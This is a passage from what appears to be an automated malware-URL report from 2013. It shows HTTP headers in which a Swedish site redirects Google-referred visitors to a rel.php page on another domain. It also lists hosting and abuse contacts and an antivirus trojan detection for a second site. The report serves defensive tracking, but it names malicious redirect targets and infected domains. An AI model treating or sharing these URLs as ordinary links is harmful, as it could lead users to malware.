mod_ssl/2.2.22 OpenSSL/0.9.8q <br>X-Powered-By: PHP/5.4.6 <br>Set-Cookie: PHPSESSID=4c5766cded98becea8e7978c16c1e9ba; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Location: http://mvsys.se/login <br>Connection: close <br>Content-Type: text/html <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mvsys.se <br>Referer: http://www.google.com/search?q=mvsys.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Fri, 31 May 2013 01:40:29 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>Location: http://kawai-corp.co.jp/rel.php <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>mvsys.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1369980737http://localtrade.se/ (194.9.94.194) - VirusAvast: JSIframeBLN Trj<br><br>localtrade.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net does not have any reliable address for s407.loopia.se<br>Found address in whois: abuse@loopia.se1369895562